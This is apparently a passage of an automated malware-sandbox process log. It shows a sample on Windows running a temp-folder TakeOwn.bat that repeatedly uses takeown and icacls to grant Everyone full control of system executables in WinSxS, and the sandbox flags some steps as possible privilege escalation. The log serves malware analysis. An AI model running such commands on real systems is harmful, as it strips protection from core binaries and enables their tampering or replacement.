C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\f\WerFaultSecure.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFault.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFault.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFault.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\r\WerFaultSecure.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\WerFault.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\WerFault.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\WerFault.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\WerFaultSecure.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\WerFaultSecure.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-errorreportingfaults_31bf3856ad364e35_10.0.22000.348_none_75b35e16f6608fe4\WerFaultSecure.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-es-authentication_31bf3856ad364e35_10.0.22000.1_none_a25504994fc2b024\EhStorAuthn.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-es-authentication_31bf3856ad364e35_10.0.22000.1_none_a25504994fc2b024\EhStorAuthn.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-es-authentication_31bf3856ad364e35_10.0.22000.1_none_a25504994fc2b024\EhStorAuthn.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eudcedit_31bf3856ad364e35_10.0.22000.1_none_ba30cc9df8a7fca4\eudcedit.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eudcedit_31bf3856ad364e35_10.0.22000.1_none_ba30cc9df8a7fca4\eudcedit.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eudcedit_31bf3856ad364e35_10.0.22000.1_none_ba30cc9df8a7fca4\eudcedit.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventcollector_31bf3856ad364e35_10.0.22000.1_none_5ba5eadfaddccaf4\wecutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventcollector_31bf3856ad364e35_10.0.22000.1_none_5ba5eadfaddccaf4\wecutil.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventcollector_31bf3856ad364e35_10.0.22000.1_none_5ba5eadfaddccaf4\wecutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventcreate_31bf3856ad364e35_10.0.22000.1_none_35fb189c78bdb167\eventcreate.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventcreate_31bf3856ad364e35_10.0.22000.1_none_35fb189c78bdb167\eventcreate.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventcreate_31bf3856ad364e35_10.0.22000.1_none_35fb189c78bdb167\eventcreate.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\f\wevtutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\f\wevtutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\f\wevtutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\r\wevtutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\r\wevtutil.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\r\wevtutil.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\wevtutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\wevtutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.469_none_c66bd96c36769493\wevtutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\f\wevtutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\f\wevtutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\f\wevtutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\r\wevtutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\r\wevtutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\r\wevtutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\wevtutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\wevtutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-eventlog-commandline_31bf3856ad364e35_10.0.22000.65_none_ad3d2613cd22d055\wevtutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-expand_31bf3856ad364e35_10.0.22000.1_none_b90ac474910a4673\expand.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-expand_31bf3856ad364e35_10.0.22000.1_none_b90ac474910a4673\expand.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-expand_31bf3856ad364e35_10.0.22000.1_none_b90ac474910a4673\expand.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\explorer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\explorer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\explorer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\f\explorer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\f\explorer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\f\explorer.exe" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\r\explorer.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\r\explorer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.120_none_576e8243334ab082\r\explorer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\explorer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\explorer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\explorer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\f\explorer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\f\explorer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\f\explorer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\r\explorer.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\r\explorer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-explorer_31bf3856ad364e35_10.0.22000.469_none_574c4adf3362fbca\r\explorer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-extrac32_31bf3856ad364e35_10.0.22000.1_none_3bc1e2973d0f3919\extrac32.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-extrac32_31bf3856ad364e35_10.0.22000.1_none_3bc1e2973d0f3919\extrac32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-extrac32_31bf3856ad364e35_10.0.22000.1_none_3bc1e2973d0f3919\extrac32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-f..temcompareutilities_31bf3856ad364e35_10.0.22000.1_none_615eec7b6e862785\comp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-f..temcompareutilities_31bf3856ad364e35_10.0.22000.1_none_615eec7b6e862785\comp.exe"3⤵
- Possible privilege escalation attempt
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-f..temcompareutilities_31bf3856ad364e35_10.0.22000.1_none_615eec7b6e862785\comp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-f..temcompareutilities_31bf3856ad364e35_10.0.22000.1_none_615eec7b6e862785\fc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-f..temcompareutilities_31bf3856ad364e35_10.0.22000.1_none_615eec7b6e862785\fc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-f..temcompareutilities_31bf3856ad364e35_10.0.22000.1_none_615eec7b6e862785\fc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-filtermanager-utils_31bf3856ad364e35_10.0.22000.1_none_7a25fafa5e81834c\fltMC.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-filtermanager-utils_31bf3856ad364e35_10.0.22000.1_none_7a25fafa5e81834c\fltMC.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-filtermanager-utils_31bf3856ad364e35_10.0.22000.1_none_7a25fafa5e81834c\fltMC.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-findstr_31bf3856ad364e35_10.0.22000.1_none_87c7d35a92de7cef\findstr.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-fontview_31bf3856ad364e35_10.0.22000.1_none_a4fc5537efa0db6f\fontview.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-fontview_31bf3856ad364e35_10.0.22000.1_none_a4fc5537efa0db6f\fontview.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-fontview_31bf3856ad364e35_10.0.22000.1_none_a4fc5537efa0db6f\fontview.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-forfiles_31bf3856ad364e35_10.0.22000.1_none_b5bbb79816b29fb5\forfiles.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-forfiles_31bf3856ad364e35_10.0.22000.1_none_b5bbb79816b29fb5\forfiles.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-forfiles_31bf3856ad364e35_10.0.22000.1_none_b5bbb79816b29fb5\forfiles.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\f\fsutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\fsutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\fsutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\fsutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\r\fsutil.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\r\fsutil.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-fsutil_31bf3856ad364e35_10.0.22000.282_none_d1df129ba9a9b56f\r\fsutil.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-ftp_31bf3856ad364e35_10.0.22000.1_none_0d83a5e891b3d321\ftp.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.22000.1_none_9c0146f8151e14ec\gpresult.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.22000.1_none_9c0146f8151e14ec\gpresult.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.22000.1_none_9c0146f8151e14ec\gpresult.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.22000.1_none_9c0146f8151e14ec\gpupdate.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.22000.1_none_9c0146f8151e14ec\gpupdate.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-g..policy-cmdlinetools_31bf3856ad364e35_10.0.22000.1_none_9c0146f8151e14ec\gpupdate.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-getmac_31bf3856ad364e35_10.0.22000.1_none_6c96deb2db24e7d4\getmac.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-getmac_31bf3856ad364e35_10.0.22000.1_none_6c96deb2db24e7d4\getmac.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-getmac_31bf3856ad364e35_10.0.22000.1_none_6c96deb2db24e7d4\getmac.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-gpowershell-exe_31bf3856ad364e35_10.0.22000.1_none_9929679adadef360\powershell_ise.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-gpowershell-exe_31bf3856ad364e35_10.0.22000.1_none_9929679adadef360\powershell_ise.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-gpowershell-exe_31bf3856ad364e35_10.0.22000.1_none_9929679adadef360\powershell_ise.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-grouppolicy-script_31bf3856ad364e35_10.0.22000.1_none_c5af807aa8d61858\gpscript.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-grouppolicy-script_31bf3856ad364e35_10.0.22000.1_none_c5af807aa8d61858\gpscript.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-grouppolicy-script_31bf3856ad364e35_10.0.22000.1_none_c5af807aa8d61858\gpscript.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-grpconv_31bf3856ad364e35_10.0.22000.1_none_03206cd676d7ae6a\grpconv.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-grpconv_31bf3856ad364e35_10.0.22000.1_none_03206cd676d7ae6a\grpconv.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-grpconv_31bf3856ad364e35_10.0.22000.1_none_03206cd676d7ae6a\grpconv.exe" /grant "everyone":(f)3⤵
-
-
-
